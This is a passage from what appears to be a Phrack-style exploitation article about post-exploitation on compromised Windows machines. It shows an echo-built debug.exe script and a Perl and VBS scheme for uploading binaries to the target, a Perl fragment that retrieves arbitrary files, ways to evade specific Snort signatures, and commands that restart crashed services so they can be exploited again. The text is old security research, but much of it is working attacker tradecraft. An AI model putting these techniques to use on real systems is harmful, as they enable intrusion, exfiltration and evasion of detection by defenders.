    C:/>echo nbell.com>b.sC:/>echo a>>b.sC:/>echo dw07B8 CD0E C310>>b.sC:/>echo.>>b.sC:/>echo R CX>>b.sC:/>echo 6 >>b.sC:/>echo W>>b.sC:/>echo Q>>b.sC:/>debug<b.s

    The echo command will construct a debug script which contains necessary instructions code in hex value to create a simple binary file. The last command will feed the script into debug.exe, which will eventually generate our binary file.

    However, we cannot construct a binary file larger than 64k. This is the limitation of the debug.exe itself.

    --[ 6.b Uploading file with VBS

    Thus, a better idea to upload a binary file is to use Visual Basic Script. VBS interpreter (cscript.exe) available by default in almost all Windows platform. This is our strategy:

    1.  create a VBS script that will read hex code from a file and   rewrite it as binary.2.  Upload the script to target using "echo" command.3.  Read file to be uploaded, and "echo" the hex code to a file in   the target server.4.  Run the VBS script to translate hex code to binary.

    A sample script like below can be use to read any binary file and create the correspondence ASC printable hex code file.

    dread: while (1){  $nread2 = sysread(INFO, $disbuf, 100);  last dread if $nread2 == 0;  @bytes = unpack "C*", $disbuf;  foreach $dab (@bytes){    $txt .= sprintf "x", $dab;  }  $to .= "echo $txt >>outhex.txt/n";  $nnn++;  if ($nnn > 100) {    print SOCKET $to;    receive();    print ".";    $to="";    $nnn=0;  }  $txt = "";}

    Then, we create our VBS decoder in the target machine - "tobin.vbs". We can easily use "echo" command to create this file in the target machine. This decoder will read the outhex.txt created above and construct the binary file.

    Set arr = WScript.Arguments Set wsf = createObject("Scripting.FileSystemObject") Set infile = wsf.opentextfile(arr(arr.Count-2), 1, TRUE) Set file = wsf.opentextfile(arr(arr.Count-1), 2, TRUE) do while infile.AtEndOfStream = false   line = infile.ReadLine For x = 1 To Len(line)-2 Step 2       thebyte = Chr(38) & "H" & Mid(line, x, 2)       file.write Chr(thebyte) Next loop file.close infile.close

    Once the decoder is in the target machine, we just need to execute it to convert the Hex code into a binary file:

    # cscript tobin.vbs outhex.txt out.exe

    --[ 5.c Retrieving file from command line

    Once we have the ability to upload file to the machine, we can upload a Base64 encoder to the target machine. We will use this encoder to encode any file into a printable Base64 format. We can easily print the output of the Base64 encoded in command line and capture the text. Once we have the complete file in Base64, we will save that into a file in our machine. Using WinZip or any Base64 decoder, we can convert that file back into its binary form. The following command allows us to retrieve any file in our target machine:

    print SOCKET "base64 -e $file outhex2.txt/n";receive();print SOCKET "type outhex2.txt/n";open(RECV, ">$file.b64");print RECV receive();

    Fortunately, all these file upload/downloading can be automated. Refer to hellobug.pl in the Code section to see file transfer in action.

    --[ 6 Avoiding IDS detection

    Snort rules now have several Attack-Response signatures that will be able to detect common output from a Windows CMD shell. Every time we start CMD, it will display a banner:

    Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:/Documents and Settings/sk

    There is a Snort rule that capture this banner:


    We can easily avoid this by spawning cmd.exe with the parameter of "/k" in our shellcode. All we need to do is just to add 3 more bytes in our shellcode from "cmd" to "cmd /k". You may also need to add 3 to the value in the decoder that count the number of byte that we need to decode.

    There is also another Snort rules that capture a directory listing of the "dir" command in a Windows shell:


    The rule compares "Volume Serial Number" in any established network packet, if there is a match, the rule will trigger an alert.

    # dirVolume in drive C is CoolVolume Serial Number is SKSK-6622

    Directory of C:/Documents and Settings/sk

    06/18/2004 06:22 PM <DIR> .06/18/2004 06:22 PM <DIR> ..12/01/2003 01:08 AM 58 ReadMe.txt

    To avoid this, we just need to include /b in our dir command. It is best if we set this in an environment so that dir will always use this argument:

    # set DIRCMD=/b# dirReadMe.txt

    Snort also has signature that detect "Command completed" in:


    This command usually generated by the "net" command. It is easy to create a wrapper for the net command that will not display "Command completed" status or use other tools like "nbtdump", etc.

    --[ 7 Restarting vulnerable service

    Most often, after a buffer overflow, the vulnerable service will be unstable. Even if we can barely keep it alive, chances are we will not be able to attack the service again. Although we can try to fix these problem in our shellcode, but the easiest way is to restart the vulnerable service via our shell. This usually can be done using "at" command to schedule a command that will restart the vulnerable service after we exit from our shell.

    For example, if our vulnerable service is IIS web server, we can reset it using a scheduler:

    #at <time> iisreset

    In the case of MS SQL Server, we just need to start the sqlserveragent service. This is a helper service installed by default when you install MS SQL Server. It will constantly monitor and check if the SQL Server process is running. If it is not, it will be started. Executing the following command in our shell will start this service, which in turn, help us to MS SQL Server once we exit.

    #net start sqlserveragent

    Another example is on the Workstation service bug discovered by Eeye. In this case, we don't have a helper service. But we can kill the relevant service, and restart it.

    1. Kill the Workstation service#taskkill /fi "SERVICES eq lanmanworkstation" /f

    2. restart required services#net start workstation#net start "computer browser"#net start "Themes" <== optional#net start "messenger" <== optional...

    If we exit our shellcode now, we can attack the machine via the Workstation exploit again.

    --[ 8 End of shellcode?

    Shellcode is simple to use and probably easiest to illustrate the severity of a vulnerability in proof of concept code. However there are a few more advance payload strategies released to the public by LSD's Windows ASM component, Core Security's Syscall Proxy, Dave Aitel's MOSDEF, etc. These payloads offer much more than a shell. The References section provides a few good pointers to get more information. We hope you enjoy reading our article as much as other quality article from Phrack.

    --[ 9 Greetz!

    There are many good fellows we would like to thank for their continuous source of information to feed our hunger for knowledge. Without these guys, the security field will be boring.

    My mentor, my friend: sam, pokleyzz, wanvadder, wyse, socket370 and the rest of =da scan clan=, Ey4s, San and all that support XFocus team! RD and the rest of THC! The Grugq! Saumil! Sheeraj! Nitesh! Caddis from Team-Teso! CK and the rest of SIG^2 team! Sensepost! BrightVaio! L33tdawg and the rest of HackInTheBox team!

    Greets to the gurus: HD Moore! Halvar! HSJ! Michal, Adam and the rest of LSD! (David) Mnemonic! Dave Aitel! EEYE! Brett Moore! And many others Blackhat speakers for their excellence research!

    --[ 10 References

    * Code to this article:http://www.scan-associates.net/papers/one-way.zip

    *  Shellcode and exploit:  HSJ - http://hsj.shadowpenguin.org/misc/

    *  More shellcode!  HD Moore - http://www.metasploit.com

    *  Advance payload:  CORE Security

    *  Syscall Proxying (http://www.blackhat.com/html/bh-usa-  02/bh-usa-02-speakers.html#Maximiliano Caceres)

    *  Inlineegg   (http://oss.coresecurity.com/projects/inlineegg.html)

    *  LSD (http://www.hivercon.com/hc02/talk-lsd.htm)

    *  Eeye (http://www.blackhat.com/html/win-usa-03/win-usa-03-  speakers.html#Riley Hassel)

    *  Dave Aitel (http://www.immunitysec.com/MOSDEF/)

    *  Alexander E. Cuttergo (Impurity)

    --[ 11 The code

    Please see http://www.scan-associates.net/papers/one-way.zip

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